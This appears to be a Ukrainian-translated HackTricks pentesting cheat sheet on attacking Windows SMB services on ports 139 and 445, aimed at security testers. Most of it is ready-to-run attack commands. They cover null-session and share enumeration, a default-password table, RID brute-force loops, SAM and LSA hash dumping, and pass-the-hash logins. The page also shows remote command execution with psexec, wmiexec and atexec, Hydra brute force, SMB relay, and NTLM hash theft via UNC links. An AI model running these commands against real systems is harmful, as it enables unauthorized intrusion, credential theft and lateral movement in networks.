| .. | ||
| README.md | ||
| rpcclient-enumeration.md | ||
139,445 - Pentesting SMB
Вивчайте хакінг AWS від нуля до героя з htARTE (Експерт з червоної команди AWS HackTricks)!
Інші способи підтримки HackTricks:
- Якщо ви хочете побачити рекламу вашої компанії на HackTricks або завантажити HackTricks у форматі PDF, перевірте ПЛАНИ ПІДПИСКИ!
- Отримайте офіційний PEASS & HackTricks мерч
- Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFT
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами на Twitter 🐦 @carlospolopm.
- Поділіться своїми хакерськими трюками, надсилайте PR до HackTricks та HackTricks Cloud репозиторіїв на GitHub.
Порт 139
_Система базового введення-виведення мережі (NetBIOS)** - це програмний протокол, призначений для забезпечення взаємодії додатків, ПК та робочих станцій в локальній мережі (LAN) з мережевим обладнанням та сприяння передачі даних по мережі. Ідентифікація та місцезнаходження програмних додатків, що працюють в мережі NetBIOS, досягається за допомогою їх імен NetBIOS, які можуть бути довжиною до 16 символів і часто відрізняються від імені комп'ютера. Сеанс NetBIOS між двома додатками ініціюється, коли один додаток (який діє як клієнт) видає команду "викликати" інший додаток (який діє як сервер), використовуючи TCP-порт 139.
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
Порт 445
Технічно порт 139 відомий як "NBT через IP", тоді як порт 445 ідентифікується як "SMB через IP". Акронім SMB означає "Server Message Blocks", який також сучасно відомий як Common Internet File System (CIFS). Як протокол мережевого рівня додатків, SMB/CIFS використовується в основному для забезпечення спільного доступу до файлів, принтерів, послідовних портів та полегшення різних форм комунікації між вузлами в мережі.
Наприклад, в контексті Windows відзначається, що SMB може працювати безпосередньо через TCP/IP, усуваючи необхідність у NetBIOS через TCP/IP, за допомогою використання порту 445. Навпаки, на різних системах спостерігається використання порту 139, що вказує на те, що SMB виконується разом з NetBIOS через TCP/IP.
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
SMB
Протокол Server Message Block (SMB), який працює в моделі клієнт-сервер, призначений для регулювання доступу до файлів, каталогів та інших мережевих ресурсів, таких як принтери та маршрутизатори. В основному використовується в серії операційних систем Windows, SMB забезпечує зворотню сумісність, дозволяючи пристроям з новішими версіями операційної системи Microsoft безперешкодно взаємодіяти з тими, що працюють на старіших версіях. Крім того, проект Samba пропонує безкоштовне програмне забезпечення, що дозволяє реалізувати SMB на системах Linux та Unix, тим самим сприяючи міжплатформенній комунікації через SMB.
Ресурси, що представляють довільні частини локальної файлової системи, можуть надаватися сервером SMB, роблячи ієрархію видимою для клієнта частково незалежною від фактичної структури сервера. Списки керування доступом (ACL), які визначають права доступу, дозволяють здійснювати деталізований контроль над дозволами користувачів, включаючи атрибути, такі як виконання, читання та повний доступ. Ці дозволи можуть бути надані окремим користувачам або групам, на основі ресурсів, і відрізняються від локальних дозволів, встановлених на сервері.
Ресурс IPC$
Доступ до ресурсу IPC$ можна отримати через анонімну порожню сесію, що дозволяє взаємодіяти з послугами, викладеними через іменовані канали. Утиліта enum4linux корисна для цієї мети. Правильно використовуючи її, можна отримати:
- Інформацію про операційну систему
- Деталі про батьківський домен
- Компіляцію локальних користувачів та груп
- Інформацію про доступні ресурси SMB
- Ефективну політику безпеки системи
Ця функціональність є критичною для мережевих адміністраторів та фахівців з безпеки для оцінки стану безпеки служб SMB (Server Message Block) в мережі. enum4linux надає всебічний огляд середовища SMB цільової системи, що є важливим для виявлення потенційних вразливостей та забезпечення належного захисту служб SMB.
enum4linux -a target_ip
Вищезазначена команда є прикладом того, як enum4linux може бути використаний для виконання повної переліку проти цілі, вказаної target_ip.
Що таке NTLM
Якщо ви не знаєте, що таке NTLM або ви хочете знати, як воно працює і як його можна зловживати, вам буде дуже цікаво цю сторінку про NTLM, де пояснено, як працює цей протокол і як ви можете з нього скористатися:
{% content-ref url="../../windows-hardening/ntlm/" %} ntlm {% endcontent-ref %}
Перелік серверів
Сканування мережі для пошуку хостів:
nbtscan -r 192.168.0.1/24
Версія сервера SMB
Для пошуку можливих вразливостей у версії SMB важливо знати, яка саме версія використовується. Якщо ця інформація не відображається в інших використовуваних інструментах, ви можете:
- Використовувати допоміжний модуль MSF _auxiliary/scanner/smb/smb_version
- Або цей скрипт:
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1
Пошук експлойту
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
Можливі Облікові дані
| Ім'я користувача | Загальні паролі |
|---|---|
| (порожній) | (порожній) |
| guest | (порожній) |
| Administrator, admin | (порожній), password, administrator, admin |
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
| backupexec, backup | backupexec, backup, arcada |
| test, lab, demo | password, test, lab, demo |
Brute Force
Інформація про середовище SMB
Отримання інформації
#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>
#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#You can use querydispinfo and enumdomusers to query user information
#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
Вибір користувачів, груп та ввімкнених користувачів
Цю інформацію вже повинно було зібрати з enum4linux та enum4linux-ng
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]
ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "
rpcclient -U "" -N 10.10.10.10
enumdomusers
enumdomgroups
Вибір користувачів локально
lookupsid.py -no-pass hostname.local
Однорядковий
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
Metasploit - Вибір локальних користувачів
use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
run
Перелік LSARPC та SAMR rpcclient
{% content-ref url="rpcclient-enumeration.md" %} rpcclient-enumeration.md {% endcontent-ref %}
GUI підключення з linux
У терміналі:
xdg-open smb://cascade.htb/
У вікні файлового браузера (nautilus, thunar, тощо)
smb://friendzone.htb/general/
Перелік загальних папок
Перелік загальних папок
Завжди рекомендується перевірити, чи ви можете отримати доступ до чого-небудь, якщо у вас немає облікових даних, спробуйте використати нульові облікові дані/гостьовий користувач.
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list
crackmapexec smb <IP> -u '' -p '' --shares #Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user
Підключення/Перелік спільної теки
Command to list shared folders:
smbclient -L //<IP_ADDRESS>
Command to connect to a shared folder:
smbclient //<IP_ADDRESS>/<SHARED_FOLDER_NAME>
#Connect using smbclient
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls' to list recursively with smbclient
#List with smbmap, without folder it list everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
Ручна перерахунок спільних ресурсів Windows та підключення до них
Можливо, вам заборонено відображати будь-які спільні ресурси на комп'ютері-хості, і коли ви намагаєтеся їх перелічити, здається, що немає жодних ресурсів для підключення. Тому варто спробувати вручну підключитися до ресурсу. Для ручного переліку ресурсів вам слід шукати відповіді, такі як NT_STATUS_ACCESS_DENIED та NT_STATUS_BAD_NETWORK_NAME, коли використовуєте дійсну сесію (наприклад, нульову сесію або дійсні облікові дані). Це може вказувати на те, чи існує ресурс та ви не маєте до нього доступу, або ресурс зовсім не існує.
Загальні назви спільних ресурсів для цілей Windows:
- C$
- D$
- ADMIN$
- IPC$
- PRINT$
- FAX$
- SYSVOL
- NETLOGON
(Загальні назви спільних ресурсів з Оцінка безпеки мережі 3-ї редакції)
Ви можете спробувати підключитися до них за допомогою наступної команди
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
або цей скрипт (використовуючи нульову сесію)
#/bin/bash
ip='<TARGET-IP-HERE>'
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')
for share in ${shares[*]}; do
output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')
if [[ -z $output ]]; then
echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
else
echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
fi
done
Приклади
smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
Перерахувати ресурси з Windows / без сторонніх інструментів
PowerShell
# Retrieves the SMB shares on the locale computer.
Get-SmbShare
Get-WmiObject -Class Win32_Share
# Retrieves the SMB shares on a remote computer.
get-smbshare -CimSession "<computer name or session object>"
# Retrieves the connections established from the local SMB client to the SMB servers.
Get-SmbConnection
Консоль CMD
# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\<ip> /all
MMC Snap-in (графічний)
# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc
explorer.exe (графічний), введіть \\<ip>\ щоб побачити доступні невидимі ресурси.
Підключення спільної теки
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
Завантаження файлів
Прочитайте попередні розділи, щоб дізнатися, як підключитися за допомогою облікових даних/Pass-the-Hash.
#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
#Download all
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *
#Download everything to current directory
Команди:
- mask: вказує маску, яка використовується для фільтрації файлів у каталозі (наприклад, "" для всіх файлів)
- recurse: перемикає рекурсію (за замовчуванням: вимкнено)
- prompt: перемикає запитання про імена файлів (за замовчуванням: увімкнено)
- mget: копіює всі файли, що відповідають масці, з хоста на клієнтську машину
(Інформація з man-сторінки smbclient)
Пошук спільних папок домену
- Snaffler****
Snaffler.exe -s -d domain.local -o snaffler.log -v data
- CrackMapExec павук.
-M павук_плюс [--share <ім'я_ресурсу>]--шаблон txt
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
Особливо цікавими з ресурсів є файли з назвою Registry.xml, оскільки вони можуть містити паролі для користувачів, налаштованих на автовхід через політику групи. Або файли web.config, оскільки вони містять облікові дані.
{% hint style="info" %}
Ресурс SYSVOL доступний для читання всіма автентифікованими користувачами в домені. Там ви можете знайти багато різних пакетів, VBScript та PowerShell скриптів.
Вам слід перевірити скрипти всередині нього, оскільки ви можете знайти чутливу інформацію, таку як паролі.
{% endhint %}
Читання реєстру
Ви можете читати реєстр за допомогою виявлених облікових даних. Impacket reg.py дозволяє вам спробувати:
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
Після експлуатації
Стандартна конфігурація сервера Samba зазвичай знаходиться в /etc/samba/smb.conf і може містити деякі небезпечні налаштування:
| Налаштування | Опис |
|---|---|
browseable = yes |
Дозволити перегляд доступних ресурсів у поточному ресурсі? |
read only = no |
Заборонити створення та зміну файлів? |
writable = yes |
Дозволити користувачам створювати та змінювати файли? |
guest ok = yes |
Дозволити підключення до служби без використання пароля? |
enable privileges = yes |
Дотримуватися привілеїв, призначених конкретному SID? |
create mask = 0777 |
Які дозволи повинні бути призначені для новостворених файлів? |
directory mask = 0777 |
Які дозволи повинні бути призначені для новостворених каталогів? |
logon script = script.sh |
Який скрипт потрібно виконати при вході користувача? |
magic script = script.sh |
Який скрипт повинен бути виконаний після закриття скрипта? |
magic output = script.out |
Де потрібно зберігати вивід магічного скрипта? |
Команда smbstatus надає інформацію про сервер та про підключених користувачів.
Аутентифікація за допомогою Kerberos
Ви можете аутентифікуватися до Kerberos за допомогою інструментів smbclient та rpcclient:
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
Виконання команд
crackmapexec
crackmapexec може виконувати команди, зловживовуючи будь-яким з mmcexec, smbexec, atexec, wmiexec, де wmiexec є методом за замовчуванням. Ви можете вказати, який варіант ви бажаєте використовувати за допомогою параметра --exec-method:
apt-get install crackmapexec
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions (
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
psexec/smbexec
Обидва варіанти створять новий сервіс (використовуючи \pipe\svcctl через SMB) на комп'ютері жертви та використовуватимуть його для виконання чогось (psexec завантажить виконавчий файл на розділ ADMIN$ та smbexec вказатиме на cmd.exe/powershell.exe та вставить у аргументи полезне навантаження --техніка без файлів-).
Додаткова інформація про psexec та smbexec.
У kali він розташований за адресою /usr/share/doc/python3-impacket/examples/
#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
Використовуючи параметр -k, ви можете аутентифікуватися проти kerberos замість NTLM
wmiexec/dcomexec
Потайно виконайте оболонку команд без звертання до диска або запуску нової служби, використовуючи DCOM через порт 135.
У kali він розташований на /usr/share/doc/python3-impacket/examples/
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
Використовуючи параметр -k, ви можете аутентифікуватися проти kerberos замість NTLM.
#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
AtExec
Виконайте команди через Планувальник завдань (використовуючи \pipe\atsvc через SMB).
У kali він розташований за адресою /usr/share/doc/python3-impacket/examples/
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"
Посилання на Impacket
https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/
Перебір облікових даних користувачів
Це не рекомендується, ви можете заблокувати обліковий запис, якщо перевищите максимально допустиму кількість спроб
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
Атака перехоплення SMB
Ця атака використовує інструментарій Responder для захоплення сеансів аутентифікації SMB внутрішньої мережі та їх пересилання на цільову машину. Якщо сеанс аутентифікації успішний, вас автоматично перенесе до командного рядка системи.
Додаткова інформація про цю атаку тут.
SMB-Trap
Бібліотека Windows URLMon.dll автоматично намагається аутентифікуватися на хості, коли сторінка намагається отримати доступ до деякого контенту через SMB, наприклад: img src="\\10.10.10.10\path\image.jpg"
Це відбувається за допомогою функцій:
- URLDownloadToFile
- URLDownloadToCache
- URLOpenStream
- URLOpenBlockingStream
Які використовуються деякими браузерами та інструментами (наприклад, Skype)
SMBTrap за допомогою MitMf
Крадіжка NTLM
Аналогічно до пастки SMB, розміщення зловмисних файлів на цільовій системі (через SMB, наприклад) може викликати спробу аутентифікації SMB, що дозволяє перехопити хеш NetNTLMv2 за допомогою інструмента, такого як Responder. Хеш потім можна розшифрувати офлайн або використовувати в атаках пересилання SMB.
Автоматичні команди HackTricks
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.
Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for SMB
Note: |
While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
#These are the commands I run in order every time I see an open SMB port
With No Creds
nbtscan {IP}
smbmap -H {IP}
smbmap -H {IP} -u null -p null
smbmap -H {IP} -u guest
smbclient -N -L //{IP}
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
rpcclient {IP}
rpcclient -U "" {IP}
crackmapexec smb {IP}
crackmapexec smb {IP} --pass-pol -u "" -p ""
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
getArch.py -target {IP}
With Creds
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
https://book.hacktricks.xyz/pentesting/pentesting-smb
Entry_2:
Name: Enum4Linux
Description: General SMB Scan
Command: enum4linux -a {IP}
Entry_3:
Name: Nmap SMB Scan 1
Description: SMB Vuln Scan With Nmap
Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}
Entry_4:
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}
Entry_5:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
Entry_6:
Name: SMB/SMB2 139/445 consolesless mfs enumeration
Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!
Інші способи підтримки HackTricks:
- Якщо ви хочете побачити свою компанію рекламовану на HackTricks або завантажити HackTricks у форматі PDF, перевірте ПЛАНИ ПІДПИСКИ!
- Отримайте офіційний PEASS & HackTricks мерч
- Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFT
- Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами на Twitter 🐦 @carlospolopm.
- Поділіться своїми хакерськими трюками, надсилайте PR до HackTricks та HackTricks Cloud репозиторіїв GitHub.